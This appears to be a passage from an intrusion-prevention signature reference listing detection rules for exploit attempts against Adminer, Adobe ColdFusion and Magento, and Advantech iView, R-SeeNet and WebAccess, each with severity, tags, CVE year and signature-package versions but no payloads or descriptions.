About this situation: An attempt to exploit a vulnerability in Adminer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Adminer, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1842-5242
Last changed: sgpkg-ips-1842-5242
Vulnerability: Adminer-Remote-Arbitrary-File-Read-CVE-2021-43008
Description:
Back to top

HTTP_CRL-Adobe-ColdFusion-Application-Server-CVE-2022-38418-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Mac OS, Any Hardware, Adobe ColdFusion, CVE2022, Windows not specific, Linux not specific, Mac OS not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1559-5242
Last changed: sgpkg-ips-1563-5242
Vulnerability: Adobe-ColdFusion-Application-Server-CVE-2022-38418-Directory-Traversal
Description:
Back to top

HTTP_CRL-Adobe-ColdFusion-Application-Server-CVE-2022-38421-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1557-5242
Last changed: sgpkg-ips-1557-5242
Vulnerability: Adobe-ColdFusion-Application-Server-CVE-2022-38421-Directory-Traversal
Description:
Back to top

HTTP_CRL-Adobe-ColdFusion-Application-Server-CVE-2023-26361-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Adobe Systems ColdFusion detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: Adobe-ColdFusion-Application-Server-CVE-2023-26361-Directory-Traversal
Description:
Back to top

HTTP_CRL-Adobe-ColdFusion-Authentication-Misconfiguration

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion administrator.cfc detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Linux, Any Hardware, Adobe ColdFusion, CVE2013, Windows not specific, Linux not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Adobe-ColdFusion-Authentication-Misconfiguration
Description:
Back to top

HTTP_CRL-Adobe-ColdFusion-CVE-2023-38204-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1623-5242
Last changed: sgpkg-ips-1623-5242
Vulnerability: Adobe-ColdFusion-CVE-2023-38204-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Adobe-ColdFusion-Deserialization-Of-Untrusted-Data-Vulnerability-CVE-2023-26360

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2023, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1579-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: Adobe-ColdFusion-Deserialization-Of-Untrusted-Data-Vulnerability-CVE-2023-26360
Description:
Back to top

HTTP_CRL-Adobe-ColdFusion-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Adobe Systems ColdFusion detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: Adobe-ColdFusion-Directory-Traversal
Description:
Back to top

HTTP_CRL-Adobe-ColdFusion-FCKeditor-Multiple-Directory-Traversal-And-File-Execution

About this situation: A multiple directory traversal vulnerability in Adobe ColdFusion FCKeditor
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, Adobe ColdFusion, CVE2009, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Adobe-ColdFusion-FCKeditor-Multiple-Directory-Traversal-And-File-Execution
Description:
Back to top

HTTP_CRL-Adobe-ColdFusion-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1613-5242
Last changed: sgpkg-ips-1613-5242
Vulnerability: Adobe-ColdFusion-Insecure-Deserialization-CVE-2023-29300
Description:
Back to top

HTTP_CRL-Adobe-ColdFusion-Scheduleedit.cfm-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Adobe Systems ColdFusion detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-1552-5242
Vulnerability: Adobe-ColdFusion-Scheduleedit.cfm-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Adobe-Commerce-And-Magento-Open-Source-group.php-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Adobe Systems Commerce detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Commerce, Adobe Magento Open Source, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: Adobe-Commerce-And-Magento-Open-Source-group.php-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Adobe-Commerce-And-Magento-Open-Source-Widget-XML-Injection

About this situation: An attempt to exploit a vulnerability in Adobe Commerce detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Commerce, Adobe Magento Open Source, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Vulnerability: Adobe-Commerce-And-Magento-Open-Source-Widget-XML-Injection
Description:
Back to top

HTTP_CRL-Adobe-Magento-Downloadcss-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Adobe Systems Magento Commerce detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Magento, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Vulnerability: Adobe-Magento-Downloadcss-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Adobe-Magento-Remote-Code-Execution-CVE-2022-24086

About this situation: An attempt to exploit a vulnerability in Adobe Magento detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Magento, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1441-5242
Last changed: sgpkg-ips-1441-5242
Vulnerability: Adobe-Magento-Remote-Code-Execution-CVE-2022-24086
Description:
Back to top

HTTP_CRL-Adobe-RoboHelp-Server-SQL-Injection

About this situation: Attempt to exploit SQL injection vulnerability in Adobe RoboHelp Server detected
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Windows, Any Hardware, Adobe Systems RoboHelp Server, CVE2008, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-159-2032
Vulnerability: HTTP-Adobe-RoboHelp-Server-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-Commandservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1360-5242
Last changed: sgpkg-ips-1360-5242
Vulnerability: Advantech-Iview-Commandservlet-Directory-Traversal
Description:
Back to top

HTTP_CRL-Advantech-Iview-Configurationservlet-Column_Value-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1515-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: Advantech-Iview-Configurationservlet-Column_Value-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-Devicetreetable-exportInventoryTable-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1324-5242
Last changed: sgpkg-ips-1345-5242
Vulnerability: Advantech-Iview-Devicetreetable-exportInventoryTable-Directory-Traversal
Description:
Back to top

HTTP_CRL-Advantech-Iview-Devicetreetable-Exporttaskmgrreport-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1502-5242
Vulnerability: Advantech-Iview-Devicetreetable-Exporttaskmgrreport-Directory-Traversal
Description:
Back to top

HTTP_CRL-Advantech-Iview-exportInventoryTable-Sort-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1494-5242
Last changed: sgpkg-ips-1494-5242
Vulnerability: Advantech-Iview-exportInventoryTable-Sort-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-Findcfgdevicelist-Segment-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1493-5242
Last changed: sgpkg-ips-1493-5242
Vulnerability: Advantech-Iview-Findcfgdevicelist-Segment-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-findTaskMgrItems-Sort-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1499-5242
Last changed: sgpkg-ips-1499-5242
Vulnerability: Advantech-Iview-findTaskMgrItems-Sort-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-Getallactivetraps-Search_Date-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Vulnerability: Advantech-Iview-Getallactivetraps-Search_Date-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-getInventoryReportData-Sort-SQL-Injection-2

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1488-5242
Last changed: sgpkg-ips-1488-5242
Vulnerability: Advantech-Iview-getInventoryReportData-Sort-SQL-Injection-2
Description:
Back to top

HTTP_CRL-Advantech-Iview-Getpsinventoryinfo-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Advantech-Iview-Getpsinventoryinfo-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-NetworkServlet-BackupDatabase-Backup_Filename-Command-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1494-5242
Last changed: sgpkg-ips-1498-5242
Vulnerability: Advantech-Iview-NetworkServlet-BackupDatabase-Backup_Filename-Command-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-Pstable-Exportpsinventorytable-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1318-5242
Last changed: sgpkg-ips-1318-5242
Vulnerability: Advantech-Iview-Pstable-Exportpsinventorytable-Directory-Traversal
Description:
Back to top

HTTP_CRL-Advantech-Iview-Runproviewupgrade-Handling-Remote-Command-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Vulnerability: Advantech-Iview-Runproviewupgrade-Handling-Remote-Command-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-Setdeviceauthentication-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1374-5242
Last changed: sgpkg-ips-1374-5242
Vulnerability: Advantech-Iview-Setdeviceauthentication-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-Set_Useraccount-Username-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1496-5242
Last changed: sgpkg-ips-1496-5242
Vulnerability: Advantech-Iview-Set_Useraccount-Username-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-Updatepromfile-Ipaddress-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1487-5242
Vulnerability: Advantech-Iview-Updatepromfile-Ipaddress-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-Updatesegmentinfo-Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1488-5242
Vulnerability: Advantech-Iview-Updatesegmentinfo-Id-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-UserServlet-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Vulnerability: Advantech-Iview-UserServlet-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-Iview-Ztpconfigtable-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech iView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech iView, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Vulnerability: Advantech-Iview-Ztpconfigtable-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-r-Seenet-Device_Graph_Page-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Advantech R-SeeNet detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech R-SeeNet, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Vulnerability: Advantech-r-Seenet-Device_Graph_Page-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Advantech-r-Seenet-Device_List-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech R-SeeNet detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech R-SeeNet, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1412-5242
Vulnerability: Advantech-r-Seenet-Device_List-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-r-Seenet-Device_Position-Device_Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech R-SeeNet detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech R-SeeNet, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Vulnerability: Advantech-r-Seenet-Device_Position-Device_Id-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-R-Seenet-Device_status.php-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Advantech R-SeeNet detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech R-SeeNet, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1634-5242
Vulnerability: Advantech-R-Seenet-Device_status.php-Local-File-Inclusion
Description:
Back to top

HTTP_CRL-Advantech-r-Seenet-Out.PHP-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Advantech R-SeeNet detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech R-SeeNet, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Vulnerability: Advantech-r-Seenet-Out.PHP-Directory-Traversal
Description:
Back to top

HTTP_CRL-Advantech-r-Seenet-Ping.PHP-Command-Injection

About this situation: An attempt to exploit a vulnerability in Advantech R-SeeNet detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech R-SeeNet, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1375-5242
Last changed: sgpkg-ips-1375-5242
Vulnerability: Advantech-r-Seenet-Ping.PHP-Command-Injection
Description:
Back to top

HTTP_CRL-Advantech-r-Seenet-SSH_Form-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Advantech R-SeeNet detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech R-SeeNet, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1382-5242
Last changed: sgpkg-ips-1382-5242
Vulnerability: Advantech-r-Seenet-SSH_Form-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Advantech-r-Seenet-Telnet_Form-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Advantech R-SeeNet detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech R-SeeNet, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1386-5242
Last changed: sgpkg-ips-1386-5242
Vulnerability: Advantech-r-Seenet-Telnet_Form-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Advantech-WebAccess-Blind-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Advantech-WebAccess-Blind-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-WebAccess-Dashboard-Multiple-Directory-Traversal-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Advantech-WebAccess-Dashboard-Removefile-Directory-Traversal
Advantech-WebAccess-Dashboard-removeFolder-Directory-Traversal
Description:
Back to top

HTTP_CRL-Advantech-WebAccess-Dashboard-Openwidget-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-744-5211
Vulnerability: Advantech-WebAccess-Dashboard-Openwidget-Directory-Traversal
Description:
Back to top

HTTP_CRL-Advantech-WebAccess-HMI-And-SCADA-Software-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-508-5211
Vulnerability: Advantech-WebAccess-HMI-And-SCADA-Software-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Advantech-WebAccess-NMS-Download.jsp-Arbitrary-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess/NMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Advantech-WebAccess-NMS-Download.jsp-Arbitrary-Directory-Traversal
Description:
Back to top

HTTP_CRL-Advantech-WebAccess-NMS-Downloadaction-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess/NMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1072-5242
Last changed: sgpkg-ips-1072-5242
Vulnerability: Advantech-WebAccess-NMS-Downloadaction-Directory-Traversal
Description:
Back to top

HTTP_CRL-Advantech-WebAccess-Node-Chklogin2-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Vulnerability: Advantech-WebAccess-Node-Chklogin2-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-WebAccess-Rmtemplate-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Vulnerability: Advantech-WebAccess-Rmtemplate.aspx-SQL-Injection
Description:
Back to top

HTTP_CRL-Advantech-WebAccess-Scada-Bwmainleft-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1371-5242
Vulnerability: Advantech-WebAccess-Scada-Bwmainleft-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Advantech-WebAccess-Scada-Wadashboard-Writefile-Arbitrary-File-Overwrite

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Advantech-WebAccess-Scada-Wadashboard-Writefile-Arbitrary-File-Overwrite
Description:
Back to top

HTTP_CRL-Advantech-WebAccess-Soap-Request-SQL-Injection

About this situation: An attempt to exploit an Advantech WebAccess Soap Request SQL Injection vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
